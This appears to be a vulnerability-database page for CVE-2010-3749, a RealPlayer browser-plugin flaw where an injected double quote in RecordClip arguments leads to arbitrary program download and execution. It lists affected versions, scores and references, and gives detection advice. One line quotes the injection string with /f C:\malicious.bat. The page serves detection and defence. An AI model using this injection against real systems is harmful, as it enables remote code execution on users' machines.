CVE-2010-3749
published 2010-10-19CVE-2010-3749: The browser-plugin implementation in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1 allows remote attackers to arguments to the…
PriorityP265critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
26.09%
97.7th percentile
The browser-plugin implementation in RealNetworks RealPlayer 11.0 through 11.1 and RealPlayer SP 1.0 through 1.1 allows remote attackers to arguments to the RecordClip method, which allows remote attackers to download an arbitrary program onto a client machine, and execute this program, via a " (double quote) in an argument to the RecordClip method, aka "parameter injection."
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realnetworks | realplayer | — | — |
| realnetworks | realplayer | — | — |
| realnetworks | realplayer | — | — |
| realnetworks | realplayer | — | — |
| realnetworks | realplayer | — | — |
| realnetworks | realplayer | — | — |
| realnetworks | realplayer | — | — |
| realnetworks | realplayer_sp | — | — |
| realnetworks | realplayer_sp | — | — |
| realnetworks | realplayer_sp | — | — |
| realnetworks | realplayer_sp | — | — |
| realnetworks | realplayer_sp | — | — |
| realnetworks | realplayer_sp | — | — |
| realnetworks | realplayer_sp | — | — |
| realnetworks | realplayer_sp | — | — |
| realnetworks | realplayer_sp | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandRecordClip(file, "audio/mpeg3", "clipInfo") with injected " /f C:\\malicious.bat /t cool_song.mp3↗
- →Monitor for RecordingManager.exe invocations containing the /f switch (arbitrary download path override) or /t switch (filename spoofing), especially when spawned by a browser process (iexplore.exe, firefox.exe), as these indicate exploitation of the RecordClip parameter injection vulnerability. ↗
- →Detect chimera files: files with a .mp3 extension that contain batch/script commands in the first few bytes. Inspect downloaded media files for non-MP3 magic bytes or embedded shell commands at file offset 0. ↗
- →Alert on double-quote characters injected into arguments passed to the RealPlayer RecordClip ActiveX method or Firefox plugin, as this is the injection delimiter used to append malicious /f and /t switches. ↗
- →The server-side payload must have a valid media file extension (e.g., .mp3). Network detection should flag .mp3 downloads from untrusted sources where the file content does not match expected MP3 structure (ID3 header or 0xFF 0xFB sync bytes). ↗
- ·The exploit targets RealPlayer 11.0–11.1 and RealPlayer SP 1.0–1.1 browser plugin (both ActiveX/IE and Firefox plugin variants). Confirm the installed RealPlayer version before applying detections, as later versions are not affected. ↗
- ·The exploit works against both the Internet Explorer ActiveX control and the Firefox plugin implementations of the RealPlayer browser plugin, so detections should cover both browser contexts. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://service.real.com/realplayer/security/10152010_player/en/http://www.exploit-db.com/exploits/15991http://www.securityfocus.com/bid/44144http://www.securityfocus.com/bid/44443http://www.zerodayinitiative.com/advisories/ZDI-10-211/http://service.real.com/realplayer/security/10152010_player/en/http://www.exploit-db.com/exploits/15991http://www.securityfocus.com/bid/44144http://www.securityfocus.com/bid/44443http://www.zerodayinitiative.com/advisories/ZDI-10-211/
2010-10-19
Published